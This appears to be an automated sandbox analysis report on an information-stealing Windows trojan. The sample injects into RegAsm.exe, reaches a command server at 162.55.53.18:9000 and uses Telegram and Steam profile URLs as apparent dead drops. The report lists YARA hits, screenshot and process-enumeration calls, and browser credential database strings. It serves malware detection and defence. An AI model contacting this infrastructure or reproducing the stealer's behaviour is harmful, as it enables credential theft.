Source: RegAsm.exe, 00000003.00000002.2942919191.00000000010E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000/vcruntime140.dlle
Source: RegAsm.exe, 00000003.00000002.2942919191.00000000010E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000/vcruntime140.dllppet
Source: RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:90001234567890hrome
Source: RegAsm.exe, 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000646ff6le
Source: RegAsm.exe, 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000FID
Source: RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000al
Source: RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000ming
Source: RegAsm.exe, 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000nbfoldnt-Disposition:
Source: RegAsm.exe, 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000tacrosoft
Source: RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000tel
Source: BAEHIE.3.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: BAEHIE.3.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: BAEHIE.3.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: BAEHIE.3.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: BAEHIE.3.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BAEHIE.3.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BAEHIE.3.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199699680841
Source: RegAsm.exe, 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp, GDBFHD.3.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: GDBFHD.3.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: RegAsm.exe, 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
Source: RegAsm.exe, 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp, GDBFHD.3.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: GDBFHD.3.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: RegAsm.exe, 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
Source: RegAsm.exe, 00000003.00000002.2942656368.0000000000F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: RegAsm.exe, 00000003.00000002.2942656368.0000000000F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/m
Source: file.exe, 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2942656368.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2942656368.0000000000FF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/memve4erin
Source: RegAsm.exe, 00000003.00000002.2942656368.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/memve4erin&
Source: RegAsm.exe, 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2942656368.0000000000FF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: BAEHIE.3.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: BAEHIE.3.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443

Source: unknown

HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49731 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00411FA6 _EH_prolog,memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

3_2_00411FA6

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 0.2.file.exe.fd0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FD9390	0_2_00FD9390
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FD60F0	0_2_00FD60F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE7842	0_2_00FE7842
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FD5810	0_2_00FD5810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FDD1F0	0_2_00FDD1F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FF8124	0_2_00FF8124
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FF13BF	0_2_00FF13BF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE7B8A	0_2_00FE7B8A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE24D3	0_2_00FE24D3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FED4B9	0_2_00FED4B9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE4480	0_2_00FE4480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041E008	3_2_0041E008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041D3DA	3_2_0041D3DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041F4F0	3_2_0041F4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041CE89	3_2_0041CE89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B3E4CF0	3_2_1B3E4CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B4F9A20	3_2_1B4F9A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B3D2018	3_2_1B3D2018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B485940	3_2_1B485940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B3D1C9E	3_2_1B3D1C9E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B3D2AA9	3_2_1B3D2AA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B3D12A8	3_2_1B3D12A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B3D292D	3_2_1B3D292D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B539CC0	3_2_1B539CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B3D3580	3_2_1B3D3580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B4653B0	3_2_1B4653B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B5AD209	3_2_1B5AD209
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B4F5040	3_2_1B4F5040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B3E9000	3_2_1B3E9000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B48D6D0	3_2_1B48D6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B479690	3_2_1B479690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B539430	3_2_1B539430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B4D4A60	3_2_1B4D4A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B3D1EF1	3_2_1B3D1EF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B3F8D2A	3_2_1B3F8D2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B3D3AB2	3_2_1B3D3AB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B458120	3_2_1B458120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B4F8030	3_2_1B4F8030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B450090	3_2_1B450090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B434760	3_2_1B434760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B468760	3_2_1B468760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B3F8763	3_2_1B3F8763
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B3F8680	3_2_1B3F8680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B510480	3_2_1B510480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B3FBAB0	3_2_1B3FBAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B3D251D	3_2_1B3D251D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B407810	3_2_1B407810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B3D290A	3_2_1B3D290A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B403370	3_2_1B403370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B3D174E	3_2_1B3D174E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B3DF160	3_2_1B3DF160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B3DAA40	3_2_1B3DAA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B3DEA80	3_2_1B3DEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B4CA940	3_2_1B4CA940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B4EA900	3_2_1B4EA900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B4B69C0	3_2_1B4B69C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B3D3E3B	3_2_1B3D3E3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B50E800	3_2_1B50E800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B3D481D	3_2_1B3D481D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B432EE0	3_2_1B432EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B416E80	3_2_1B416E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B5AAEBE	3_2_1B5AAEBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B3D19DD	3_2_1B3D19DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B3D209F	3_2_1B3D209F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B45A0B0	3_2_1B45A0B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B3E66C0	3_2_1B3E66C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B3FA560	3_2_1B3FA560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B4CA590	3_2_1B4CA590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B3D47AF	3_2_1B3D47AF

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00FDCCA0 appears 57 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004024D7 appears 312 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00419412 appears 112 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 1B3D395E appears 79 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 1B3D3AF3 appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 1B3D415B appears 135 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 1B3D1C2B appears 47 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 1B3D1F5A appears 34 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 1B5B06B1 appears 36 times

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 336

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 0.2.file.exe.fd0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@8/15@1/2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410F6C _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

3_2_00410F6C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0041136D _EH_prolog,CoCreateInstance,SysAllocString,_wtoi64,SysFreeString,SysFreeString,

3_2_0041136D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\PFTM0GXP.htm

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5572

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\8856bebd-0d96-4a38-a47c-ea35fa3b8443

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Command line argument: ADSdsfrhgt		0_2_00FD9390
Source: C:\Users\user\Desktop\file.exe	Command line argument: Alister		0_2_00FD9390

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegAsm.exe, 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2943981511.0000000015676000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.3.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: RegAsm.exe, 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2943981511.0000000015676000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2943981511.0000000015676000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.3.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: RegAsm.exe, 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2943981511.0000000015676000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2943981511.0000000015676000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.3.dr	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: RegAsm.exe, 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2943981511.0000000015676000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.3.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: RegAsm.exe, 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2943981511.0000000015676000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.3.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2943981511.0000000015676000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: RegAsm.exe, 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2943981511.0000000015676000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.3.dr	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: CBKFBA.3.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2943981511.0000000015676000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.3.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: RegAsm.exe, 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2943981511.0000000015676000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.3.dr	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: file.exe

Virustotal: Detection: 37%

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 336
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
